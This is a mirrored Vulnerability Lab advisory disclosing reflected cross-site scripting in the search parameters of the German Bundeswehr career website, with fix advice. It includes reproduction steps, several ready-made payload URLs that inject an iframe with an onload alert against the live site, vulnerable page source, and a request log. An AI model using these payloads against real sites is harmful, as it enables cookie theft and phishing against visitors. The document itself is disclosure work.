Share
## https://sploitus.com/exploit?id=PACKETSTORM:157246
Document Title:  
===============  
Bundeswehr Karriere - Cross Site Scripting Vulnerability  
  
  
References (Source):  
====================  
https://www.vulnerability-lab.com/get_content.php?id=2213  
  
Vulnerability Magazine:  
https://www.vulnerability-db.com/?q=articles/2020/04/04/bundeswehr-career-page-weak-spot-permanently-closed  
  
Video: https://www.vulnerability-lab.com/get_content.php?id=2197  
  
  
Release Date:  
=============  
2020-04-15  
  
  
Vulnerability Laboratory ID (VL-ID):  
====================================  
2213  
  
  
Common Vulnerability Scoring System:  
====================================  
4  
  
  
Vulnerability Class:  
====================  
Cross Site Scripting - Non Persistent  
  
  
Current Estimated Price:  
========================  
1.000‚ā¨ - 2.000‚ā¨  
  
  
Product & Service Introduction:  
===============================  
Als Bundeswehr bezeichnet man die Streitkräfte der Bundesrepublik  
Deutschland einschließlich der Bundeswehrverwaltung und  
weiterer Organisationsbereiche, die im Geschäftsbereich des  
Bundesministeriums der Verteidigung liegen. Die BWI Informationstechnik  
GmbH wurde 2006 von Bundeswehr, IBM und Siemens gegr√ľndet. Zusammen mit  
den Gesellschaften BWI Systeme GmbH und BWI  
Services GmbH bildet sie den BWI Leistungsverbund zur Umsetzung von  
Herkules, der größten öffentlich-privaten  
Partnerschaft in Europa.  
  
(Copy of the Homepage: https://de.wikipedia.org/wiki/Bundeswehr)  
(Copy of the Homepage:  
https://de.wikipedia.org/wiki/BWI_Informationstechnik)  
  
  
Abstract Advisory Information:  
==============================  
The Vulnerability Laboratory Core APT Research Team has identified  
several cross site scripting vulnerabilities in a  
web application of the German Bundeswehr. The Bundeswehr career portal  
is affected.  
  
  
Affected Product(s):  
===============  
Hersteller: Bundeswehr  
Technology: Web-Server  
Produkt: Bundeswehr Karriereportal (Web-Applikation)  
Module: Suchmaschine - Karriere  
Dienstleister: BWI  
  
  
Vulnerability Disclosure Timeline:  
==================================  
2020-04-15: Public Disclosure (Vulnerability Laboratory)  
  
  
Discovery Status:  
=================  
Published  
  
  
Exploitation Technique:  
=======================  
Remote  
  
  
Severity Level:  
===============  
Medium  
  
  
Authentication Type:  
====================  
Pre auth - no privileges  
  
  
User Interaction:  
=================  
Low User Interaction  
  
  
Disclosure Type:  
================  
Coordinated Disclosure  
  
  
Technical Details & Description:  
================================  
Several non-persistent cross site scripting scripting security  
vulnerabilities have been discovered in the official career site of  
the German Bundeswehr. The vulnerability type allows attackers to  
manipulate client-side controlled application calls.  
  
The cross site scripting vulnerabilities are located in the  
'termination', 'interests', 'careers' and 'search' parameters of  
the 'career' module in the 'search' function. The GET method request is  
not cleanly cleaned up when retrieving with the vulnerable  
parameters. There is no validation where the request is intercepted,  
cleaned or filtered. As a result,  
attackers can submit their own malicious input to the https request to  
the official Bundeswehr career website. In the  
search, all parameters from the new page are listed and thus finally  
executed via the request. In the case of a  
successful attack, an attacker could, for example, steal session  
information such as cookies, generate phishing pages,  
identify persons with external calls, integrate client-side exploits  
(drive-by) or redirect to harmful web server pages.  
Since the web server should recognize all external sources or integrated  
calls, there may be a problem with the  
security of the SSL certificate via the Same Origin Policy.  
  
The security risk of cross site scripting vulnerabilities in the search  
function of the web application are considered medium.  
To exploit the vulnerability, an attacker does not need a web  
application user account, but does require light user  
interaction by visiting a link. Exploitation of the vulnerability  
results in the theft of cookie information, calling harmful  
external sources in the Bundeswehr web context or spear phishing attacks.  
  
Request Method(s):  
[+] GET  
  
Vulnerable Service(s):  
[+] Bundeswehr Karriere (Web-Applikation) www.bundeswehrkarriere.de  
  
Vulnerable Module(s):  
[+] Karriere Suche (ajax/filterlist/de/auswahl/33050/)  
  
Vulnerable Parameter(s):  
[+] Abschluss  
[+] Interessen  
[+] Laufbahnen  
[+] Suche  
  
  
Proof of Concept (PoC):  
=======================  
The vulnerabilities can be exploited by attackers without a privileged  
user account but with light user interaction.  
For security demonstration or to reproduce the vulnerability follow the  
provided information and steps below to continue.  
  
  
Manuelle Schritte zum reproduzieren der Sicherheitsl√ľcke  
1. √Ėffne die Bundeswehr Karriere Webseite  
Note: https://www.bundeswehrkarriere.de/karriere  
2. Starte einen http/https protocol session tamper zum eingreifen in den  
Aufruf (live)  
3. Starte eine Suche und klick auf die Lupe  
4. Beim suchen f√ľgt der Angreifer live im session tamper programm im GET  
method request seine payloads ein  
5. Der Inhalt der Parameter wird unten in der Suche ausgegeben und f√ľhrt  
sich direkt aus  
6. Erfolgreiche Reproduktion der Sicherheitsl√ľcke!  
  
  
PoC: Payloads (Exploitation)  
https://www.bundeswehrkarriere.de/karriere#auswahl=Militaerisch/Zivil:%20%3E%22%3Ciframe%20src=evil.source%20onload=alert(%22CYBERALLIANZ%22)%3E;Abschluss:Abitur;Interessen:Fuehrung;Laufbahnen:Unteroffiziere;Suche:test  
  
https://www.bundeswehrkarriere.de/karriere#auswahl=Militaerisch/Zivil:Militaerisch;Abschluss:Abitur;Interessen:Fuehrung;Laufbahnen:%20%3E%22%3Ciframe%20src=evil.source%20onload=alert(%22CYBERALLIANZ%22)%3E;Suche:test  
  
https://www.bundeswehrkarriere.de/karriere#auswahl=Militaerisch/Zivil:Militaerisch;Abschluss:Abitur;Interessen:%20%3E%22%3Ciframe%20src=evil.source%20onload=alert(%22CYBERALLIANZ%22)%3E;Laufbahnen:Unteroffiziere;Suche:test  
  
https://www.bundeswehrkarriere.de/karriere#auswahl=Militaerisch/Zivil:Militaerisch;Abschluss:%20%3E%22%3Ciframe%20src=evil.source%20onload=alert(%22CYBERALLIANZ%22)%3E;Interessen:Fuehrung;Laufbahnen:Unteroffiziere;Suche:test  
  
https://www.bundeswehrkarriere.de/karriere#auswahl=Militaerisch/Zivil:Militaerisch;Abschluss:Abitur;Interessen:Fuehrung;Laufbahnen:Unteroffiziere;Suche:test%20%3E%22%3Ciframe%20src=evil.source%20onload=alert(%22CYBERALLIANZ%22)%3E  
  
  
  
PoC: Vulnerable Source  
<div class="row">  
<div class="col-lg-6 col-md-6 col-sm-6 col-xs-12 js-filter  
js-filter-multi" data-defaultlabel="Bitte wählen Sie"  
data-selectlabel="gewählt" data-update="true"  
data-required="false" data-disabled="true" data-connection="OR"  
data-key="subjecttaxonomy" data-label="Organisationsbereiche"  
data-id="33052">  
<h5 class="">Organisationsbereiche</h5>  
<select class="filter-select js-select select2-hidden-accessible"  
multiple="" data-enable-placeholder="true" data-placeholder="Bitte  
wählen Sie" tabindex="-1" style="" aria-hidden="true">  
<option data-label="Bundeswehrverwaltung" data-id="31730"  
data-facet="0" value="31730"  
data-text="Bundeswehrverwaltung">Bundeswehrverwaltung</option>  
<option data-label="Heer" data-id="31732" data-facet="0"  
value="31732" data-text="Heer">Heer</option>  
<option data-label="Luftwaffe" data-id="31820" data-facet="0"  
value="31820" data-text="Luftwaffe">Luftwaffe</option>  
<option data-label="Marine" data-id="31822" data-facet="0"  
value="31822" data-text="Marine">Marine</option>  
<option data-label="Streitkraeftebasis" data-id="31824"  
data-facet="0" value="31824"  
data-text="Streitkräftebasis">Streitkräftebasis</option>  
<option data-label="Sanitaetsdienst" data-id="50290"  
data-facet="0" value="50290"  
data-text="Sanitätsdienst">Sanitätsdienst</option>  
</select><span class="select2 select2-container  
select2-container--default" dir="ltr" style="width: 155px;"><span  
class="selection"><span class="select2-selection  
select2-selection--multiple"  
role="combobox" aria-autocomplete="list" aria-haspopup="true"  
aria-expanded="false" tabindex="-1"><ul  
class="select2-selection__rendered"><li class="select2-search  
select2-search--inline first last">  
<span tabindex="0" class="search-placeholder" data-title="Bitte wählen  
Sie" data-defaulttitle="Bitte wählen Sie"><input  
class="select2-selection--multiple select2-search__field" type="button">  
</span></li></ul></span></span><span class="dropdown-wrapper"  
aria-hidden="true"></span></span>  
</div><div class="col-lg-6 col-md-6 col-sm-6 col-xs-12 js-filter  
js-filter-single" data-defaultlabel="Bitte wählen Sie"  
data-update="true" data-connection="OR" data-key="subjecttaxonomy"  
data-required="false" data-disabled="true" data-label="Laufbahnen"  
data-id="33122">  
<h5 class="">Laufbahnen</h5>  
<div class="btn-group-responsive">  
<select class="filter-select js-select  
select2-hidden-accessible" data-enable-placeholder="true"  
data-placeholder="Bitte wählen Sie" tabindex="-1" style=""  
aria-hidden="true">  
<option>Bitte wählen Sie</option>  
<option data-label="Mannschaften" data-id="31858"  
data-facet="0" value="31858" data-text="Mannschaften">Mannschaften</option>  
<option data-label="Unteroffiziere" data-id="31864"  
data-facet="0" value="31864"  
data-text="Unteroffiziere">Unteroffiziere</option>  
<option data-label="Feldwebel" data-id="31860" data-facet="0"  
value="31860" data-text="Feldwebel">Feldwebel</option>  
<option data-label="Offiziere" data-id="31862" data-facet="0"  
value="31862" data-text="Offiziere">Offiziere</option>  
<option data-label="Reserve" data-id="50304" data-facet="0"  
value="50304" data-text="Reserve">Reserve</option>  
<option data-label="Mittlerer_Dienst" data-id="41976"  
data-facet="0" value="41976" data-text="Mittlerer Dienst">Mittlerer  
Dienst</option>  
<option data-label="Gehobener_Dienst" data-id="41978"  
data-facet="0" value="41978" data-text="Gehobener Dienst">Gehobener  
Dienst</option>  
<option data-label="Hoeherer_Dienst" data-id="41980"  
data-facet="0" value="41980" data-text="Höherer Dienst">Höherer  
Dienst</option>  
</select><span class="select2 select2-container  
select2-container--default select2-container--below" dir="ltr"  
style="width: 125px;"><span class="selection">  
<span class="select2-selection select2-selection--single"  
role="combobox" aria-autocomplete="list" aria-haspopup="true"  
aria-expanded="false" tabindex="0"  
aria-labelledby="select2-kbwa-container"><span  
class="select2-selection__rendered" id="select2-kbwa-container"  
title="Unteroffiziere"><span><span class="js-label">Unteroffiziere</span>  
<span class="caret"></span></span></span><span  
class="select2-selection__arrow" role="presentation"><b  
role="presentation"></b></span></span></span>  
<span class="dropdown-wrapper" aria-hidden="true"></span></span>  
</div>  
</div></div>  
<div class="row">  
<div class="col-lg-12 col-md-12 col-sm-12 col-xs-12 js-filter  
js-filter-search" data-update="true" data-connection="OR" data-key="search"  
data-required="false" data-disabled="true" data-label="Suche"  
data-id="33126">  
<h5 class=" hidden">Suche</h5>  
<div class="form-group">  
<input class="form-control js-search-input"  
placeholder="Suchbegriff" type="text">  
<input id="search-term" class="js-search-submit" value="Suche"  
type="button">  
</div>  
</div></div>  
PoC: Execution  
Suche  
Laufbahn  
Bitte wählen Sie**  
AuswahlX  
<javascript:void();>AbiturX>"<[MALICIOUS PAYLOAD!]  
<javascript:void();>UnteroffiziereX>"<[MALICIOUS PAYLOAD!]  
<javascript:void();>FuehrungX>"<[MALICIOUS PAYLOAD!]  
<javascript:void();>test >"<[MALICIOUS PAYLOAD!]  
//  
Laufbahnen  
* // Laufbahnen <#>  
* // Jobprofile <#>  
* // Auch interessant <#>  
Keine Treffer gefunden  
Bitte geben Sie Ihren bereits erreichten oder angestrebten  
Schulabschluss an, damit wir Ihnen Ihre passenden Jobmöglichkeiten  
anzeigen koennen.  
  
  
--- PoC Session Logs [GET] ---  
Status: 200[OK]  
GET  
https://www.bundeswehrkarriere.de/ajax/filterlist/de/auswahl/33050/h_368f9ea9884c87f4c9d45368542ba48f?subjecttaxonomy=33120%2331848%3B33118%2331770%3B33052%2331732%3B33122%2341980%3B50510%2350470  
&search=33126%23%3E%22%3Ciframe+src%3Dhttp%3A%2F%2Fwww.test.de%3E&limit=12&offset=0&sort=relevance+asc%3Bsearchdate+asc  
  
Mime Type[text/html]  
Request Header:  
Host[www.bundeswehrkarriere.de]  
Referer[https://www.bundeswehrkarriere.de/karriere]  
Connection[keep-alive]  
Response Header:  
200 OK  
Server[Apache]  
Content-Type[text/html;charset=UTF-8]  
Content-Language[de]  
x-varnish[23952790]  
Via[1.1 varnish-v4]  
Accept-Ranges[bytes]  
Connection[close]  
  
  
Solution - Fix & Patch:  
=======================  
The security gap can be quickly resolved by the following work-around ...  
1. Input fields must prevent the input of special characters (Disallow  
Specialchars)  
2. Parse or filter the content of the parameters via GET to prevent input  
3. Use the escape function for the output at the end of the function  
4. Check why the SSL certificate does not expire on external calls  
  
  
Security Risk:  
==============  
The security risk of client-side cross site scripting web vulnerability  
in the Bundeswehr career application is to be rated as medium.  
  
  
Credits & Authors:  
==================  
Vulnerability-Lab -  
https://www.vulnerability-lab.com/show.php?user=Vulnerability-Lab  
Benjamin Kunz Mejri -  
https://www.vulnerability-lab.com/show.php?user=Benjamin%20K.M.  
  
  
  
Disclaimer & Information:  
=========================  
The information provided in this advisory is provided as it is without  
any warranty. Vulnerability Lab disclaims all warranties,  
either expressed or implied, including the warranties of merchantability  
and capability for a particular purpose. Vulnerability-Lab  
or its suppliers are not liable in any case of damage, including direct,  
indirect, incidental, consequential loss of business profits  
or special damages, even if Vulnerability-Lab or its suppliers have been  
advised of the possibility of such damages. Some states do  
not allow the exclusion or limitation of liability for consequential or  
incidental damages so the foregoing limitation may not apply.  
We do not approve or encourage anybody to break any licenses, policies,  
deface websites, hack into databases or trade with stolen data.  
  
Domains: www.vulnerability-lab.com www.vuln-lab.com   
www.vulnerability-db.com  
Services: magazine.vulnerability-lab.com  
paste.vulnerability-db.com infosec.vulnerability-db.com  
Social: twitter.com/vuln_lab facebook.com/VulnerabilityLab   
youtube.com/user/vulnerability0lab  
Feeds: vulnerability-lab.com/rss/rss.php  
vulnerability-lab.com/rss/rss_upcoming.php  
vulnerability-lab.com/rss/rss_news.php  
Programs: vulnerability-lab.com/submit.php  
vulnerability-lab.com/register.php  
vulnerability-lab.com/list-of-bug-bounty-programs.php  
  
Any modified copy or reproduction, including partially usages, of this  
file requires authorization from Vulnerability Laboratory.  
Permission to electronically redistribute this alert in its unmodified  
form is granted. All other rights, including the use of other  
media, are reserved by Vulnerability-Lab Research Team or its suppliers.  
All pictures, texts, advisories, source code, videos and other  
information on this website is trademark of vulnerability-lab team & the  
specific authors or managers. To record, list, modify, use or  
edit our material contact (admin@ or research@) to get a ask permission.  
  
Copyright © 2020 | Vulnerability Laboratory - [Evolution  
Security GmbH]‚ĄĘ  
  
  
  
  
  
  
--   
VULNERABILITY LABORATORY - RESEARCH TEAM  
SERVICE: www.vulnerability-lab.com